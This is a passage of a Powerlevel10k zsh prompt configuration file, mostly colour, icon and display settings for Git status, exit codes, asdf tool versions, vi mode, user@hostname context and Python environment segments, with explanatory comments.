(( VCS_STATUS_COMMITS_BEHIND )) && res+=" ${clean}⇣${VCS_STATUS_COMMITS_BEHIND}"
# ⇡42 if ahead of the remote; no leading space if also behind the remote: ⇣42⇡42.
(( VCS_STATUS_COMMITS_AHEAD && !VCS_STATUS_COMMITS_BEHIND )) && res+=" "
(( VCS_STATUS_COMMITS_AHEAD )) && res+="${clean}⇡${VCS_STATUS_COMMITS_AHEAD}"
# ⇠42 if behind the push remote.
(( VCS_STATUS_PUSH_COMMITS_BEHIND )) && res+=" ${clean}⇠${VCS_STATUS_PUSH_COMMITS_BEHIND}"
(( VCS_STATUS_PUSH_COMMITS_AHEAD && !VCS_STATUS_PUSH_COMMITS_BEHIND )) && res+=" "
# ⇢42 if ahead of the push remote; no leading space if also behind: ⇠42⇢42.
(( VCS_STATUS_PUSH_COMMITS_AHEAD )) && res+="${clean}⇢${VCS_STATUS_PUSH_COMMITS_AHEAD}"
# *42 if have stashes.
(( VCS_STATUS_STASHES )) && res+=" ${clean}*${VCS_STATUS_STASHES}"
# 'merge' if the repo is in an unusual state.
[[ -n $VCS_STATUS_ACTION ]] && res+=" ${conflicted}${VCS_STATUS_ACTION}"
# ~42 if have merge conflicts.
(( VCS_STATUS_NUM_CONFLICTED )) && res+=" ${conflicted}~${VCS_STATUS_NUM_CONFLICTED}"
# +42 if have staged changes.
(( VCS_STATUS_NUM_STAGED )) && res+=" ${modified}+${VCS_STATUS_NUM_STAGED}"
# !42 if have unstaged changes.
(( VCS_STATUS_NUM_UNSTAGED )) && res+=" ${modified}!${VCS_STATUS_NUM_UNSTAGED}"
# ?42 if have untracked files. It's really a question mark, your font isn't broken.
# See POWERLEVEL9K_VCS_UNTRACKED_ICON above if you want to use a different icon.
# Remove the next line if you don't want to see untracked files at all.
(( VCS_STATUS_NUM_UNTRACKED )) && res+=" ${untracked}${(g::)POWERLEVEL9K_VCS_UNTRACKED_ICON}${VCS_STATUS_NUM_UNTRACKED}"
# "─" if the number of unstaged files is unknown. This can happen due to
# POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY (see below) being set to a non-negative number lower
# than the number of files in the Git index, or due to bash.showDirtyState being set to false
# in the repository config. The number of staged and untracked files may also be unknown
# in this case.
(( VCS_STATUS_HAS_UNSTAGED == -1 )) && res+=" ${modified}─"
typeset -g my_git_format=$res
}
functions -M my_git_formatter 2>/dev/null
# Don't count the number of unstaged, untracked and conflicted files in Git repositories with
# more than this many files in the index. Negative value means infinity.
#
# If you are working in Git repositories with tens of millions of files and seeing performance
# sagging, try setting POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY to a number lower than the output
# of `git ls-files | wc -l`. Alternatively, add `bash.showDirtyState = false` to the repository's
# config: `git config bash.showDirtyState false`.
typeset -g POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY=-1
# Don't show Git status in prompt for repositories whose workdir matches this pattern.
# For example, if set to '~', the Git repository at $HOME/.git will be ignored.
# Multiple patterns can be combined with '|': '~(|/foo)|/bar/baz/*'.
typeset -g POWERLEVEL9K_VCS_DISABLED_WORKDIR_PATTERN='~'
# Disable the default Git status formatting.
typeset -g POWERLEVEL9K_VCS_DISABLE_GITSTATUS_FORMATTING=true
# Install our own Git status formatter.
typeset -g POWERLEVEL9K_VCS_CONTENT_EXPANSION='${$((my_git_formatter()))+${my_git_format}}'
# Enable counters for staged, unstaged, etc.
typeset -g POWERLEVEL9K_VCS_{STAGED,UNSTAGED,UNTRACKED,CONFLICTED,COMMITS_AHEAD,COMMITS_BEHIND}_MAX_NUM=-1
# Custom icon.
typeset -g POWERLEVEL9K_VCS_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_VCS_PREFIX='on '
# Show status of repositories of these types. You can add svn and/or hg if you are
# using them. If you do, your prompt may become slow even when your current directory
  # isn't in an svn or hg repository.
typeset -g POWERLEVEL9K_VCS_BACKENDS=(git)
##########################[ status: exit code of the last command ]###########################
# Enable OK_PIPE, ERROR_PIPE and ERROR_SIGNAL status states to allow us to enable, disable and
# style them independently from the regular OK and ERROR state.
typeset -g POWERLEVEL9K_STATUS_EXTENDED_STATES=true
# Status on success. No content, just an icon. No need to show it if prompt_char is enabled as
# it will signify success by turning green.
typeset -g POWERLEVEL9K_STATUS_OK=false
typeset -g POWERLEVEL9K_STATUS_OK_VISUAL_IDENTIFIER_EXPANSION='✔'
# typeset -g POWERLEVEL9K_STATUS_OK_FOREGROUND=2
# typeset -g POWERLEVEL9K_STATUS_OK_BACKGROUND=0
# Status when some part of a pipe command fails but the overall exit status is zero. It may look
# like this: 1|0.
typeset -g POWERLEVEL9K_STATUS_OK_PIPE=true
typeset -g POWERLEVEL9K_STATUS_OK_PIPE_VISUAL_IDENTIFIER_EXPANSION='✔'
# typeset -g POWERLEVEL9K_STATUS_OK_PIPE_FOREGROUND=2
# typeset -g POWERLEVEL9K_STATUS_OK_PIPE_BACKGROUND=0
# Status when it's just an error code (e.g., '1'). No need to show it if prompt_char is enabled as
# it will signify error by turning red.
typeset -g POWERLEVEL9K_STATUS_ERROR=false
typeset -g POWERLEVEL9K_STATUS_ERROR_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_BACKGROUND=1
# Status when the last command was terminated by a signal.
typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL=true
# Use terse signal names: "INT" instead of "SIGINT(2)".
typeset -g POWERLEVEL9K_STATUS_VERBOSE_SIGNAME=false
typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_BACKGROUND=1
# Status when some part of a pipe command fails and the overall exit status is also non-zero.
# It may look like this: 1|0.
typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE=true
typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_BACKGROUND=1
###################[ command_execution_time: duration of the last command ]###################
# Execution time color.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FOREGROUND=0
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_BACKGROUND=3
  # Show duration of the last command if it takes at least this many seconds.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=3
# Show this many fractional digits. Zero means round to seconds.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
# Duration format: 1d 2h 3m 4s.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FORMAT='d h m s'
# Custom icon.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PREFIX='took '
#######################[ background_jobs: presence of background jobs ]#######################
# Background jobs color.
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_FOREGROUND=6
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_BACKGROUND=0
# Don't show the number of background jobs.
typeset -g POWERLEVEL9K_BACKGROUND_JOBS_VERBOSE=false
# Custom icon.
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ direnv: direnv status (https://direnv.net/) ]########################
# Direnv color.
# typeset -g POWERLEVEL9K_DIRENV_FOREGROUND=3
# typeset -g POWERLEVEL9K_DIRENV_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_DIRENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ asdf: asdf version manager (https://github.com/asdf-vm/asdf) ]###############
# Default asdf color. Only used to display tools for which there is no color override (see below).
# Tip: Override these parameters for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_FOREGROUND and
# POWERLEVEL9K_ASDF_${TOOL}_BACKGROUND.
typeset -g POWERLEVEL9K_ASDF_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_BACKGROUND=7
# There are four parameters that can be used to hide asdf tools. Each parameter describes
# conditions under which a tool gets hidden. Parameters can hide tools but not unhide them. If at
# least one parameter decides to hide a tool, that tool gets hidden. If no parameter decides to
# hide a tool, it gets shown.
#
# Special note on the difference between POWERLEVEL9K_ASDF_SOURCES and
# POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW. Consider the effect of the following commands:
#
# asdf local python 3.8.1
# asdf global python 3.8.1
#
# After running both commands the current python version is 3.8.1 and its source is "local" as
# it takes precedence over "global". If POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW is set to false,
# it'll hide python version in this case because 3.8.1 is the same as the global version.
# POWERLEVEL9K_ASDF_SOURCES will hide python version only if the value of this parameter doesn't
# contain "local".
# Hide tool versions that don't come from one of these sources.
#
# Available sources:
#
# - shell `asdf current` says "set by ASDF_${TOOL}_VERSION environment variable"
# - local `asdf current` says "set by /some/not/home/directory/file"
# - global `asdf current` says "set by /home/username/file"
#
# Note: If this parameter is set to (shell local global), it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SOURCES.
typeset -g POWERLEVEL9K_ASDF_SOURCES=(shell local global)
# If set to false, hide tool versions that are the same as global.
#
# Note: The name of this parameter doesn't reflect its meaning at all.
# Note: If this parameter is set to true, it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_PROMPT_ALWAYS_SHOW.
typeset -g POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW=false
# If set to false, hide tool versions that are equal to "system".
#
# Note: If this parameter is set to true, it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SHOW_SYSTEM.
typeset -g POWERLEVEL9K_ASDF_SHOW_SYSTEM=true
# If set to non-empty value, hide tools unless there is a file matching the specified file pattern
# in the current directory, or its parent directory, or its grandparent directory, and so on.
#
# Note: If this parameter is set to empty value, it won't hide tools.
# Note: SHOW_ON_UPGLOB isn't specific to asdf. It works with all prompt segments.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SHOW_ON_UPGLOB.
#
# Example: Hide nodejs version when there is no package.json and no *.js files in the current
# directory, in `..`, in `../..` and so on.
#
# typeset -g POWERLEVEL9K_ASDF_NODEJS_SHOW_ON_UPGLOB='*.js|package.json'
typeset -g POWERLEVEL9K_ASDF_SHOW_ON_UPGLOB=
# Ruby version from asdf.
typeset -g POWERLEVEL9K_ASDF_RUBY_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_RUBY_BACKGROUND=1
# typeset -g POWERLEVEL9K_ASDF_RUBY_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_RUBY_SHOW_ON_UPGLOB='*.foo|*.bar'
# Python version from asdf.
typeset -g POWERLEVEL9K_ASDF_PYTHON_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PYTHON_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_PYTHON_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PYTHON_SHOW_ON_UPGLOB='*.foo|*.bar'
# Go version from asdf.
typeset -g POWERLEVEL9K_ASDF_GOLANG_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_GOLANG_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_GOLANG_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_GOLANG_SHOW_ON_UPGLOB='*.foo|*.bar'
# Node.js version from asdf.
typeset -g POWERLEVEL9K_ASDF_NODEJS_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_NODEJS_BACKGROUND=2
# typeset -g POWERLEVEL9K_ASDF_NODEJS_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_NODEJS_SHOW_ON_UPGLOB='*.foo|*.bar'
# Rust version from asdf.
typeset -g POWERLEVEL9K_ASDF_RUST_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_RUST_BACKGROUND=208
# typeset -g POWERLEVEL9K_ASDF_RUST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_RUST_SHOW_ON_UPGLOB='*.foo|*.bar'
# .NET Core version from asdf.
typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_SHOW_ON_UPGLOB='*.foo|*.bar'
# Flutter version from asdf.
typeset -g POWERLEVEL9K_ASDF_FLUTTER_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_FLUTTER_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_FLUTTER_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_FLUTTER_SHOW_ON_UPGLOB='*.foo|*.bar'
# Lua version from asdf.
typeset -g POWERLEVEL9K_ASDF_LUA_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_LUA_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_LUA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_LUA_SHOW_ON_UPGLOB='*.foo|*.bar'
# Java version from asdf.
typeset -g POWERLEVEL9K_ASDF_JAVA_FOREGROUND=1
typeset -g POWERLEVEL9K_ASDF_JAVA_BACKGROUND=7
# typeset -g POWERLEVEL9K_ASDF_JAVA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_JAVA_SHOW_ON_UPGLOB='*.foo|*.bar'
# Perl version from asdf.
typeset -g POWERLEVEL9K_ASDF_PERL_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PERL_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_PERL_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PERL_SHOW_ON_UPGLOB='*.foo|*.bar'
# Erlang version from asdf.
typeset -g POWERLEVEL9K_ASDF_ERLANG_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_ERLANG_BACKGROUND=1
# typeset -g POWERLEVEL9K_ASDF_ERLANG_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_ERLANG_SHOW_ON_UPGLOB='*.foo|*.bar'
# Elixir version from asdf.
typeset -g POWERLEVEL9K_ASDF_ELIXIR_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_ELIXIR_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_ELIXIR_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_ELIXIR_SHOW_ON_UPGLOB='*.foo|*.bar'
# Postgres version from asdf.
typeset -g POWERLEVEL9K_ASDF_POSTGRES_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_POSTGRES_BACKGROUND=6
# typeset -g POWERLEVEL9K_ASDF_POSTGRES_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_POSTGRES_SHOW_ON_UPGLOB='*.foo|*.bar'
# PHP version from asdf.
typeset -g POWERLEVEL9K_ASDF_PHP_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PHP_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_PHP_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PHP_SHOW_ON_UPGLOB='*.foo|*.bar'
# Haskell version from asdf.
typeset -g POWERLEVEL9K_ASDF_HASKELL_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_HASKELL_BACKGROUND=3
# typeset -g POWERLEVEL9K_ASDF_HASKELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_HASKELL_SHOW_ON_UPGLOB='*.foo|*.bar'
# Julia version from asdf.
typeset -g POWERLEVEL9K_ASDF_JULIA_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_JULIA_BACKGROUND=2
# typeset -g POWERLEVEL9K_ASDF_JULIA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_JULIA_SHOW_ON_UPGLOB='*.foo|*.bar'
##########[ nordvpn: nordvpn connection status, linux only (https://nordvpn.com/) ]###########
# NordVPN connection indicator color.
# typeset -g POWERLEVEL9K_NORDVPN_FOREGROUND=7
# typeset -g POWERLEVEL9K_NORDVPN_BACKGROUND=4
# Hide NordVPN connection indicator when not connected.
typeset -g POWERLEVEL9K_NORDVPN_{DISCONNECTED,CONNECTING,DISCONNECTING}_CONTENT_EXPANSION=
typeset -g POWERLEVEL9K_NORDVPN_{DISCONNECTED,CONNECTING,DISCONNECTING}_VISUAL_IDENTIFIER_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_NORDVPN_VISUAL_IDENTIFIER_EXPANSION='⭐'
#################[ ranger: ranger shell (https://github.com/ranger/ranger) ]##################
# Ranger shell color.
# typeset -g POWERLEVEL9K_RANGER_FOREGROUND=3
# typeset -g POWERLEVEL9K_RANGER_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_RANGER_VISUAL_IDENTIFIER_EXPANSION='⭐'
######################[ nnn: nnn shell (https://github.com/jarun/nnn) ]#######################
# Nnn shell color.
# typeset -g POWERLEVEL9K_NNN_FOREGROUND=0
# typeset -g POWERLEVEL9K_NNN_BACKGROUND=6
# Custom icon.
# typeset -g POWERLEVEL9K_NNN_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########################[ vim_shell: vim shell indicator (:sh) ]###########################
# Vim shell indicator color.
# typeset -g POWERLEVEL9K_VIM_SHELL_FOREGROUND=0
# typeset -g POWERLEVEL9K_VIM_SHELL_BACKGROUND=2
# Custom icon.
# typeset -g POWERLEVEL9K_VIM_SHELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
######[ midnight_commander: midnight commander shell (https://midnight-commander.org/) ]######
# Midnight Commander shell color.
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_FOREGROUND=3
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ nix_shell: nix shell (https://nixos.org/nixos/nix-pills/developing-with-nix-shell.html) ]##
# Nix shell color.
# typeset -g POWERLEVEL9K_NIX_SHELL_FOREGROUND=0
# typeset -g POWERLEVEL9K_NIX_SHELL_BACKGROUND=4
# Tip: If you want to see just the icon without "pure" and "impure", uncomment the next line.
# typeset -g POWERLEVEL9K_NIX_SHELL_CONTENT_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_NIX_SHELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
##################################[ disk_usage: disk usage ]##################################
# Colors for different levels of disk usage.
# typeset -g POWERLEVEL9K_DISK_USAGE_NORMAL_FOREGROUND=3
# typeset -g POWERLEVEL9K_DISK_USAGE_NORMAL_BACKGROUND=0
# typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_FOREGROUND=0
# typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_BACKGROUND=3
# typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_FOREGROUND=7
# typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_BACKGROUND=1
# Thresholds for different levels of disk usage (percentage points).
typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_LEVEL=90
typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_LEVEL=95
# If set to true, hide disk usage when below $POWERLEVEL9K_DISK_USAGE_WARNING_LEVEL percent.
typeset -g POWERLEVEL9K_DISK_USAGE_ONLY_WARNING=false
# Custom icon.
# typeset -g POWERLEVEL9K_DISK_USAGE_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ vi_mode: vi mode (you don't need this if you've enabled prompt_char) ]###########
# Foreground color.
typeset -g POWERLEVEL9K_VI_MODE_FOREGROUND=0
# Text and color for normal (a.k.a. command) vi mode.
typeset -g POWERLEVEL9K_VI_COMMAND_MODE_STRING=NORMAL
typeset -g POWERLEVEL9K_VI_MODE_NORMAL_BACKGROUND=2
# Text and color for visual vi mode.
typeset -g POWERLEVEL9K_VI_VISUAL_MODE_STRING=VISUAL
typeset -g POWERLEVEL9K_VI_MODE_VISUAL_BACKGROUND=4
# Text and color for overtype (a.k.a. overwrite and replace) vi mode.
typeset -g POWERLEVEL9K_VI_OVERWRITE_MODE_STRING=OVERTYPE
typeset -g POWERLEVEL9K_VI_MODE_OVERWRITE_BACKGROUND=3
# Text and color for insert vi mode.
typeset -g POWERLEVEL9K_VI_INSERT_MODE_STRING=
typeset -g POWERLEVEL9K_VI_MODE_INSERT_FOREGROUND=8
######################################[ ram: free RAM ]#######################################
# RAM color.
# typeset -g POWERLEVEL9K_RAM_FOREGROUND=0
# typeset -g POWERLEVEL9K_RAM_BACKGROUND=3
# Custom icon.
# typeset -g POWERLEVEL9K_RAM_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################################[ swap: used swap ]######################################
# Swap color.
# typeset -g POWERLEVEL9K_SWAP_FOREGROUND=0
# typeset -g POWERLEVEL9K_SWAP_BACKGROUND=3
# Custom icon.
# typeset -g POWERLEVEL9K_SWAP_VISUAL_IDENTIFIER_EXPANSION='⭐'
######################################[ load: CPU load ]######################################
# Show average CPU load over this many last minutes. Valid values are 1, 5 and 15.
typeset -g POWERLEVEL9K_LOAD_WHICH=5
# Load color when load is under 50%.
# typeset -g POWERLEVEL9K_LOAD_NORMAL_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_NORMAL_BACKGROUND=2
# Load color when load is between 50% and 70%.
# typeset -g POWERLEVEL9K_LOAD_WARNING_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_WARNING_BACKGROUND=3
# Load color when load is over 70%.
# typeset -g POWERLEVEL9K_LOAD_CRITICAL_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_CRITICAL_BACKGROUND=1
# Custom icon.
# typeset -g POWERLEVEL9K_LOAD_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ todo: todo items (https://github.com/todotxt/todo.txt-cli) ]################
# Todo color.
# typeset -g POWERLEVEL9K_TODO_FOREGROUND=0
# typeset -g POWERLEVEL9K_TODO_BACKGROUND=8
# Hide todo when the total number of tasks is zero.
typeset -g POWERLEVEL9K_TODO_HIDE_ZERO_TOTAL=true
# Hide todo when the number of tasks after filtering is zero.
typeset -g POWERLEVEL9K_TODO_HIDE_ZERO_FILTERED=false
# Todo format. The following parameters are available within the expansion.
#
# - P9K_TODO_TOTAL_TASK_COUNT The total number of tasks.
# - P9K_TODO_FILTERED_TASK_COUNT The number of tasks after filtering.
#
# These variables correspond to the last line of the output of `todo.sh -p ls`:
#
# TODO: 24 of 42 tasks shown
#
# Here 24 is P9K_TODO_FILTERED_TASK_COUNT and 42 is P9K_TODO_TOTAL_TASK_COUNT.
#
# typeset -g POWERLEVEL9K_TODO_CONTENT_EXPANSION='$P9K_TODO_FILTERED_TASK_COUNT'
# Custom icon.
# typeset -g POWERLEVEL9K_TODO_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ timewarrior: timewarrior tracking status (https://timewarrior.net/) ]############
# Timewarrior color.
# typeset -g POWERLEVEL9K_TIMEWARRIOR_FOREGROUND=255
# typeset -g POWERLEVEL9K_TIMEWARRIOR_BACKGROUND=8
# If the tracked task is longer than 24 characters, truncate and append "…".
# Tip: To always display tasks without truncation, delete the following parameter.
# Tip: To hide task names and display just the icon when time tracking is enabled, set the
# value of the following parameter to "".
typeset -g POWERLEVEL9K_TIMEWARRIOR_CONTENT_EXPANSION='${P9K_CONTENT:0:24}${${P9K_CONTENT:24}:+…}'
# Custom icon.
# typeset -g POWERLEVEL9K_TIMEWARRIOR_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############[ taskwarrior: taskwarrior task count (https://taskwarrior.org/) ]##############
# Taskwarrior color.
# typeset -g POWERLEVEL9K_TASKWARRIOR_FOREGROUND=0
# typeset -g POWERLEVEL9K_TASKWARRIOR_BACKGROUND=6
# Taskwarrior segment format. The following parameters are available within the expansion.
#
# - P9K_TASKWARRIOR_PENDING_COUNT The number of pending tasks: `task +PENDING count`.
# - P9K_TASKWARRIOR_OVERDUE_COUNT The number of overdue tasks: `task +OVERDUE count`.
#
# Zero values are represented as empty parameters.
#
# The default format:
#
# '${P9K_TASKWARRIOR_OVERDUE_COUNT:+"!$P9K_TASKWARRIOR_OVERDUE_COUNT/"}$P9K_TASKWARRIOR_PENDING_COUNT'
#
# typeset -g POWERLEVEL9K_TASKWARRIOR_CONTENT_EXPANSION='$P9K_TASKWARRIOR_PENDING_COUNT'
# Custom icon.
# typeset -g POWERLEVEL9K_TASKWARRIOR_VISUAL_IDENTIFIER_EXPANSION='⭐'
##################################[ context: user@hostname ]##################################
# Context color when running with privileges.
typeset -g POWERLEVEL9K_CONTEXT_ROOT_FOREGROUND=1
typeset -g POWERLEVEL9K_CONTEXT_ROOT_BACKGROUND=0
# Context color in SSH without privileges.
typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_FOREGROUND=3
typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_BACKGROUND=0
# Default context color (no privileges, no SSH).
typeset -g POWERLEVEL9K_CONTEXT_FOREGROUND=3
typeset -g POWERLEVEL9K_CONTEXT_BACKGROUND=0
# Context format when running with privileges: user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_ROOT_TEMPLATE='%n@%m'
# Context format when in SSH without privileges: user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_TEMPLATE='%n@%m'
# Default context format (no privileges, no SSH): user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_TEMPLATE='%n@%m'
# Don't show context unless running with privileges or in SSH.
# Tip: Remove the next line to always show context.
typeset -g POWERLEVEL9K_CONTEXT_{DEFAULT,SUDO}_{CONTENT,VISUAL_IDENTIFIER}_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_CONTEXT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Custom prefix.
# typeset -g POWERLEVEL9K_CONTEXT_PREFIX='with '
###[ virtualenv: python virtual environment (https://docs.python.org/3/library/venv.html) ]###
# Python virtual environment color.
# typeset -g POWERLEVEL9K_VIRTUALENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_VIRTUALENV_BACKGROUND=4
# Don't show Python version next to the virtual environment name.
typeset -g POWERLEVEL9K_VIRTUALENV_SHOW_PYTHON_VERSION=false
# If set to "false", won't show virtualenv if pyenv is already shown.
# If set to "if-different", won't show virtualenv if it's the same as pyenv.
typeset -g POWERLEVEL9K_VIRTUALENV_SHOW_WITH_PYENV=false
# Separate environment name from Python version only with a space.
typeset -g POWERLEVEL9K_VIRTUALENV_{LEFT,RIGHT}_DELIMITER=
# Custom icon.
# typeset -g POWERLEVEL9K_VIRTUALENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################[ anaconda: conda environment (https://conda.io/) ]######################
# Anaconda environment color.
# typeset -g POWERLEVEL9K_ANACONDA_FOREGROUND=0
# typeset -g POWERLEVEL9K_ANACONDA_BACKGROUND=4
# Anaconda segment format. The following parameters are available within the expansion.
#
# - CONDA_PREFIX Absolute path to the active Anaconda/Miniconda environment.
# - CONDA_DEFAULT_ENV Name of the active Anaconda/Miniconda environment.
# - CONDA_PROMPT_MODIFIER Configurable prompt modifier (see below).
# - P9K_ANACONDA_PYTHON_VERSION Current python version (python --version).
#
# CONDA_PROMPT_MODIFIER can be configured with the following command:
#
# conda config --set env_prompt '({default_env}) '
#
# The last argument is a Python format string that can use the following variables:
#
# - prefix The same as CONDA_PREFIX.
# - default_env The same as CONDA_DEFAULT_ENV.
# - name The last segment of CONDA_PREFIX.
# - stacked_env Comma-separated list of names in the environment stack. The first element is
# always the same as default_env.
#
# Note: '({default_env}) ' is the default value of env_prompt.
#
# The default value of POWERLEVEL9K_ANACONDA_CONTENT_EXPANSION expands to $CONDA_PROMPT_MODIFIER
# without the surrounding parentheses, or to the last path component of CONDA_PREFIX if the former
# is empty.
typeset -g POWERLEVEL9K_ANACONDA_CONTENT_EXPANSION='${${${${CONDA_PROMPT_MODIFIER#\(}% }%\)}:-${CONDA_PREFIX:t}}'
# Custom icon.
# typeset -g POWERLEVEL9K_ANACONDA_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ pyenv: python environment (https://github.com/pyenv/pyenv) ]################
# Pyenv color.
# typeset -g POWERLEVEL9K_PYENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PYENV_BACKGROUND=4
# Hide python version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PYENV_SOURCES=(shell local global)
# If set to false, hide python version if it's the same as global:
# $(pyenv version-name) == $(pyenv global).
